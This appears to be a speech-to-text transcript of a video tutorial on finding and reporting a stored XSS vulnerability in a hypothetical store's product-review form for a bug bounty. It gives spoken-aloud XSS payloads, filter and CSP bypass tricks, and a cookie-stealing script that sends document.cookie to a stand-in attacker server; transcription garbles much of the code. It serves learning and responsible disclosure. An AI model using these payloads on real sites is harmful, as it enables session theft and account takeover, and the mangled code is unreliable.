Download this code from codegive.com, link in the description below. OK, let's dive deep into a hypothetical $6,000 bounty XSS vulnerability scenario. This tutorial will cover identifying the vulnerability, crafting payloads, bypassing common mitigations, and writing a comprehensive report. I'll also provide code examples and explanations, but remember that the exact details will vary depending on the specific target application. Disclaimer: this information is for educational purposes only. Attempting to exploit vulnerabilities without permission is illegal and unethical. Always obtain proper authorization before testing any system. Scenario: let's assume we're testing a web application for an online retail store. The application allows users to write product reviews. Reviews are displayed publicly on product pages. The application uses a framework like React, Angular, or vue.js, but a vulnerability exists in the sanitization of user input within one specific component. Targeted functionality: product review submission. Vulnerability: cross-site scripting, XSS, specifically, stored XSS. This means that the malicious script is saved in the application's database and executed every time a user views the affected page. Why a $6,000 bounty? Stored XSS. Stored XSS is generally considered more severe than reflected XSS because it can affect a wider range of users and doesn't require tricking victims into clicking a malicious link. Sensitive data access. A skilled attacker might be able to use the XSS to steal user credentials, session cookies, or other sensitive data. Application complexity. If the application is built on a complex framework and uses multiple layers of security, bypassing those layers to achieve XSS significantly increases the bounty potential. Business impact. If the XSS could lead to defacement of the website, data breaches, or loss of user trust, the bounty would likely be higher. Bounty program terms. The specific terms of the bounty program will determine the reward. Step 1. Reconnaissance and discovery. Understand the application. First, thoroughly explore the application. Create an account, navigate through all the features, and try to understand how data flows. Focus on user-generated content areas. Identify input points. Make a list of all input fields, including text boxes, drop-downs, and radio buttons. Product review forms are a prime candidate for XSS. Analyze the request/response. Use your browser's developer tools, usually opened with F12, to inspect the network traffic when submitting a review. Pay attention to request method. Is it GET or POST? Request headers. Are there any custom headers that might affect how the input is processed? Request body. This is where the review data is sent. Observe how the data is encoded, example URL encoded, JSON. Response headers. Look for security headers like Content Security Policy, CSP, XXSS Protection, X-Frame Options, and X-Content Type Options. These headers can help mitigate XSS attacks. Response body. Check how the submitted review is displayed on the page. Is the input being properly encoded? Are any HTML tags being filtered? Step 2. Basic XSS testing. Start with simple XSS payloads to see if the application is vulnerable. Try these in the product review form. Script alert, XSS/script. imgsrc equals x1 error equals alert, XSS. svg onload equals alert, XSS. onmouse over equals alert, XSS. Example code In this example, the JavaScript code takes the input from the review text area and directly inserts it into the review display div using inner HTML. This is a major vulnerability because it allows an attacker to inject arbitrary HTML, including JavaScript code. If the alert XSS box appears, you've confirmed a basic XSS vulnerability. Step 3. Bypassing mitigations. Modern web applications often have security measures in place to prevent XSS. Here are some common techniques to bypass these mitigations. Input validation / filtering case sensitivity try variations in capitalization, example script. HTML encoding use HTML entities, example and LT, script and GT, alert, end quote, XSS end quote and LT / script and GT. URL encoding encode parts of the payload using URL encoding, example %3 script %3 alert, %22 XSS %22, %3c / script %3e. Double encoding encode the payload multiple times, example and amp, LT, script and amp, GT. Character insertion insert null bytes or other special characters within the payload, example scree \0 pt. String concatenation break up the payload into multiple strings and concatenate them using JavaScript, example script var a equals al, var b equals ert, alert, a plus b plus, xss, / script. Blacklisting if the application is blacklisting specific tags or keywords, try alternative techniques. Alternative tags use other tags that can execute JavaScript, example imgsrc equals x1 error equals alert, xss, svg onload equals alert, xss, body onload equals alert, xss. Event handlers exploit event handlers like onClick, onMouseOver, onFocus, etc. Data use data to embed JavaScript code within an image tag, example imgsrc equals data image / svg plus xml svg onload equals alert, xss. Obfuscation use JavaScript obfuscation techniques to hide the malicious code. This can involve encoding, character replacement, or more complex transformations. Content Security Policy, CSP, bypasses CSP is a powerful security mechanism that restricts the sources from which a browser can load resources. Bypassing CSP can be complex and often depends on the specific CSP configuration. Some common bypass techniques include finding weak directives look for overly permissive directives like script src unsafe inline, which allows inline scripts, or script src which allows scripts from any domain. Exploiting misconfigured CDNs if the CSP allows scripts from a specific CDN, look for vulnerabilities in the CDN itself. Using JSON endpoints JSON with padding, endpoints can sometimes be used to bypass CSP by allowing you to execute JavaScript code from a trusted domain. AngularJS Sandbox Escape. If applicable, older versions of AngularJS had a sandbox that could be bypassed to execute arbitrary JavaScript. Contextual escaping understand how the input is being used in the output. Is it being placed within an HTML attribute, a JavaScript string, or a CSS style? The appropriate escaping technique will depend on the context. Example, bypassing a basic filter, removing script tags. Let's say the application removes script tags. You can try using the img src equals x1 error equals alert, xss, payload instead. Example, bypassing HTML encoding, using UTF-8. Sometimes applications convert characters to HTML entities but don't account for UTF-8 encoding. If you can use UTF-8 characters, try this. Example, CSP bypass, weak unsafe inline directive. If the CSP contains script src unsafe inline, you can simply use an inline script tag. Step 4, crafting a powerful payload. Once you've found a way to inject JavaScript code, it's time to craft a more sophisticated payload that can demonstrate the impact of the vulnerability. Here are some things you might want to do. Steal cookies. Capture the user's session cookies and send them to your server. This is a common and high-impact demonstration. Redirect the user. Redirect the user to a malicious website. Deface the website. Modify the content of the page to demonstrate the ability to manipulate the application. Keylogging. Use with extreme caution and ethical considerations. Record the user's keystrokes and send them to your server. This is highly sensitive and should only be done in a controlled environment with explicit permission. Account takeover. Try to use the XSS to modify user profile data or perform actions on behalf of the user. Important considerations for payloads. Minimize the payload size. Shorter payloads are less likely to be detected by filters. Use JavaScript obfuscation. Sparingly obfuscation can help bypass some filters, but it can also make your payload more suspicious. Test on different browsers. Ensure that your payload works consistently across different browsers, Chrome, Firefox, Safari, Edge. Example, a combined payload, cookie stealing and redirection. Step 5, understanding the impact. Determine the scope. How many users are affected by the vulnerability? Is it limited to a specific product page, or does it affect the entire website? Identify sensitive data. What types of data can be accessed or modified through the XSS? User credentials, financial information, personal data. Assess the business risk. What is the potential impact on the business? Data breach, reputational damage, financial loss. Step 6, writing a comprehensive report. A well-written report is crucial for getting a higher bounty. Your report should include the following. Title. A clear and concise title, such as stored XSS vulnerability in product review form. Executive summary. A brief overview of the vulnerability, its impact, and your recommended remediation. Vulnerability details. Description. Explain the vulnerability in detail. What is XSS, and how does it work in this specific case? Location. Specify the exact URL and input field where the vulnerability exists. Affected parameter. Identify the specific parameters that are vulnerable. Attack vector. Describe how an attacker could exploit the vulnerability. Impact. Explain the potential consequences of the vulnerability. Steps to reproduce. Provide clear and concise steps that the development team can follow to reproduce the vulnerability. Include screenshots and code snippets. Proof of concept, POC. Include the XSS payload that you used to demonstrate the vulnerability. Provide evidence, example screenshots, network traffic logs, that the payload was successfully executed. Remediation recommendations. Suggests specific steps that the development team can take to fix the vulnerability. This might include Asterisk input validation. Asterisk validate all user input to ensure that it conforms to expected formats. Asterisk output encoding / escaping. Asterisk properly encode or escape all user input before displaying it on the page. Use context-aware escaping, example HTML escaping, JavaScript escaping, URL escaping. Asterisk content security policy, CSP. Implement a strict CSP to restrict the sources from which the browser can load resources. Asterisk regular security audits. Asterisk conduct regular security audits to identify and fix vulnerabilities. Asterisk severity rating. Asterisk assign a severity rating to the vulnerability, example critical, high, medium, low, based on its impact and exploitability. Use a standardized scoring system like CVSS, Common Vulnerability Scoring System. Example report snippet. Asterisk HTML script var cookie equals document.cookie var URL equals https://yourattackerserver.com/log cookie equals plus cookie fetch URL mode no cores /script. Key tips for getting a higher bounty. Asterisk provide a clear and concise report. Make it easy for the security team to understand the vulnerability and reproduce it. Demonstrate impact. Show how the vulnerability can be exploited and what the potential consequences are. Suggest practical remediation steps. Show that you understand how to fix the vulnerability. Be professional and respectful. Maintain a professional tone in your communication with the security team. Be patient. It may take some time for the security team to investigate the vulnerability and determine the bounty amount. Important notes. This is a hypothetical scenario. The exact details of the vulnerability and the bypass techniques will vary depending on the specific target application. Ethical considerations. Always obtain proper authorization before testing any system. Never attempt to exploit vulnerabilities without permission. Keep learning. The field of web security is constantly evolving. Stay up to date on the latest vulnerabilities and mitigation techniques. Practice. The best way to learn about XSS is to practice finding and exploiting vulnerabilities in controlled environments. Use intentionally vulnerable web applications like OWASP WebGoat or BWAPP. By following these steps and practicing regularly, you can improve your skills in finding and exploiting XSS vulnerabilities and potentially earn significant bug bounties. Good luck, and stay ethical.